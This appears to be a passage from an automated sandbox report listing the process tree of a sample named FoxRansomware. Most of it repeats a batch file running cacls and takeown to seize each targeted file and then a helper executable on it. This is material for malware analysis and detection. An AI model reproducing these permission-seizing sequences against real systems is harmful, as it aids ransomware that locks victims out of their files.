    C:\Windows\SysWOW64\takeown.exe [PID 2908]  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin"
    C:\Windows\SysWOW64\cmd.exe [PID 5772]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000B1.bin" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 2604]  fjPLyeD8.exe -accepteula "000000B1.bin" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 4948]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 4704]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
    C:\Windows\SysWOW64\cacls.exe [PID 2928]  cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 7268]  takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
    C:\Windows\SysWOW64\cmd.exe [PID 4524]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "overlay.png" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 8052]  fjPLyeD8.exe -accepteula "overlay.png" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 6976]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 2572]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""
    C:\Windows\SysWOW64\cacls.exe [PID 8072]  cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 8132] [Modifies file permissions]  takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"
    C:\Windows\SysWOW64\cmd.exe [PID 2824]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 4200]  fjPLyeD8.exe -accepteula "resource.xml" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 8076]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 4988]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml""
    C:\Windows\SysWOW64\cacls.exe [PID 6984]  cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 4028] [Modifies file permissions]  takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml"
    C:\Windows\SysWOW64\cmd.exe [PID 8168]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 5948]  fjPLyeD8.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 7752]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 5752]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml""
    C:\Windows\SysWOW64\cacls.exe [PID 4252]  cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 6300]  takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml"
    C:\Windows\SysWOW64\cmd.exe [PID 4528]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 3388]  fjPLyeD8.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 3784]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 5744]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml""
    C:\Windows\SysWOW64\cacls.exe [PID 1572]  cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 1584] [Modifies file permissions]  takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml"
    C:\Windows\SysWOW64\cmd.exe [PID 2128]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 7548]  fjPLyeD8.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 4820]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 2464]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""
    C:\Windows\SysWOW64\cacls.exe [PID 3448]  cacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 6324]  takeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"
    C:\Windows\SysWOW64\cmd.exe [PID 5048]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 6336]  fjPLyeD8.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 6492]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 2564]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin""
    C:\Windows\SysWOW64\cacls.exe [PID 5180]  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 5192]  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin"
    C:\Windows\SysWOW64\cmd.exe [PID 5236]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000000F.bin" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 2220]  fjPLyeD8.exe -accepteula "0000000F.bin" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 7096]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 5556]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin""
    C:\Windows\SysWOW64\cacls.exe [PID 1124]  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 7256]  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin"
    C:\Windows\SysWOW64\cmd.exe [PID 6280]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000000Q.bin" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 6344]  fjPLyeD8.exe -accepteula "0000000Q.bin" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 6448]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 5512]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin""
    C:\Windows\SysWOW64\cacls.exe [PID 304]  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 6332]  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin"
    C:\Windows\SysWOW64\cmd.exe [PID 4068]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000014.bin" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 6068]  fjPLyeD8.exe -accepteula "00000014.bin" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 6428]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 4272]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""
    C:\Windows\SysWOW64\cacls.exe [PID 5240]  cacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 896]  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"
    C:\Windows\SysWOW64\cmd.exe [PID 3572]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "KnownGameList.bin" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 1568]  fjPLyeD8.exe -accepteula "KnownGameList.bin" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 5256]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin""2⤵PID:8136
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin" /E /G Admin:F /C3⤵PID:6808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin"3⤵PID:1884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000058.bin" -nobanner3⤵PID:4696
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000058.bin" -nobanner4⤵PID:1536
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3716
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin""2⤵PID:6100
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin" /E /G Admin:F /C3⤵PID:5916
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin"3⤵PID:5220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000007E.bin" -nobanner3⤵PID:3032
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000007E.bin" -nobanner4⤵PID:4584
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7236
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin""2⤵PID:7468
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin" /E /G Admin:F /C3⤵PID:5288
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin"3⤵PID:5504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000007O.bin" -nobanner3⤵PID:6868
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000007O.bin" -nobanner4⤵PID:5800
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6220
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin""2⤵PID:940
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin" /E /G Admin:F /C3⤵PID:1388
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin"3⤵
- Modifies file permissions
PID:7472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000008D.bin" -nobanner3⤵PID:2816
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000008D.bin" -nobanner4⤵PID:5344
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6760
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin""2⤵PID:5548
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin" /E /G Admin:F /C3⤵PID:7092
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin"3⤵
- Modifies file permissions
PID:7788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000008N.bin" -nobanner3⤵PID:7360
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000008N.bin" -nobanner4⤵PID:5636
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6296
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin""2⤵PID:3144
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin" /E /G Admin:F /C3⤵PID:7172
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin"3⤵
- Modifies file permissions
PID:7464
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000093.bin" -nobanner3⤵PID:6860
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000093.bin" -nobanner4⤵PID:5644
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5632
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin""2⤵PID:7164
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin" /E /G Admin:F /C3⤵PID:7668
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin"3⤵
- Modifies file permissions
PID:6732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000A9.bin" -nobanner3⤵PID:7996
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "000000A9.bin" -nobanner4⤵PID:4648
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7580
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin""2⤵PID:7960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin" /E /G Admin:F /C3⤵PID:7156
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin"3⤵PID:1608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000007.bin" -nobanner3⤵PID:7984
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000007.bin" -nobanner4⤵PID:5460
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5168
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin""2⤵PID:7628
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin" /E /G Admin:F /C3⤵PID:8116
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin"3⤵PID:5376
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000000L.bin" -nobanner3⤵PID:7244
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000000L.bin" -nobanner4⤵PID:5380
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6500
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin""2⤵PID:5516
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin" /E /G Admin:F /C3⤵PID:7452
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin"3⤵PID:7896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000000V.bin" -nobanner3⤵PID:7924
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000000V.bin" -nobanner4⤵PID:5544
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:688
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.13146fa0-5eea-490f-bb18-886e36bf1f2c.1.etl""2⤵PID:5648
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.13146fa0-5eea-490f-bb18-886e36bf1f2c.1.etl" /E /G Admin:F /C3⤵PID:5392
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.13146fa0-5eea-490f-bb18-886e36bf1f2c.1.etl"3⤵
- Modifies file permissions
PID:4064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "UpdateSessionOrchestration.13146fa0-5eea-490f-bb18-886e36bf1f2c.1.etl" -nobanner3⤵PID:5952
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "UpdateSessionOrchestration.13146fa0-5eea-490f-bb18-886e36bf1f2c.1.etl" -nobanner4⤵PID:7504
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4640
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin""2⤵PID:6424
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin" /E /G Admin:F /C3⤵PID:3040
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin"3⤵PID:2068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000000C.bin" -nobanner3⤵PID:3484
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000000C.bin" -nobanner4⤵PID:5568
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:712
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin""2⤵PID:6040
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin" /E /G Admin:F /C3⤵PID:2460
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin"3⤵
- Modifies file permissions
PID:3620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000000O.bin" -nobanner3⤵PID:2592
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000000O.bin" -nobanner4⤵PID:6764
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6104
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin""2⤵PID:6176
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin" /E /G Admin:F /C3⤵PID:7324
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin"3⤵PID:3308
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000012.bin" -nobanner3⤵PID:904
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000012.bin" -nobanner4⤵PID:1300
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6936
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin""2⤵PID:8056
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin" /E /G Admin:F /C3⤵PID:7928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin"3⤵PID:6816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000056.bin" -nobanner3⤵PID:5888
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000056.bin" -nobanner4⤵PID:5268
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4900
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin""2⤵PID:8088
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin" /E /G Admin:F /C3⤵PID:5684
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin"3⤵PID:6984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000072.bin" -nobanner3⤵PID:4028
-
